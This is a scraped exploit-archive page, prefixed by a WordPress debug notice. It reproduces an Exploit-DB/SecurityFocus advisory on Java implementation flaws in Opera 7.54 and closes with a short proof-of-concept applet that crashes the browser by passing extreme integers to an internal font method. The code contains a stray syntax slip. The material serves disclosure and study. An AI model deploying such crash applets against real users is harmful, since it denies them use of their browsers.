Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Multiple remote vulnerabilities in Opera Web Browser Java implementation - exploit.company
header-logo
Suggest Exploit
vendor:
Opera Web Browser
by:
Unknown
7.5
CVSS
HIGH
Insecure proprietary design
Unknown
CWE
Product Name: Opera Web Browser
Affected Version From: 7.54
Affected Version To: 7.54
Patch Exists: NO
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Multiple remote vulnerabilities in Opera Web Browser Java implementation

The vulnerabilities in the Opera Web Browser Java implementation allow an attacker to craft a Java applet that violates Sun's Java secure programming guidelines. These vulnerabilities can be exploited to carry out various attacks, including sensitive information disclosure and denial of service attacks. Successful exploitation would occur with the privileges of the user running the affected browser application.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/11712/info

Multiple remote vulnerabilities reportedly affect the Opera Web Browser Java implementation. These issues are due to the insecure proprietary design of the Web browser's Java implementation.

These issues may allow an attacker to craft a Java applet that violate Sun's Java secure programming guidelines.

These issues may be leveraged to carry out a variety of unspecified attacks including sensitive information disclosure and denial of service attacks. Any successful exploitation would take place with the privileges of the user running the affected browser application.

Although only version 7.54 is reportedly vulnerable, it is likely that earlier versions are vulnerable to these issues as well.

import sun.awt.font.*;

public class Opera754FontCrashApplet extends java.applet.Applet{

	public void start() {
		int j =
		javax.swing.JOptionPane.showConfirmDialog(null,"Illegalaccess.org | Step1 Opera 754 FontCrash, wanna crash? ");
		if (j == 0)? {
			NativeFontWrapper.getFullNameByIndex(Integer.MIN_VALUE);
			NativeFontWrapper.getFullNameByIndex(Integer.MAX_VALUE);
		}
	}
}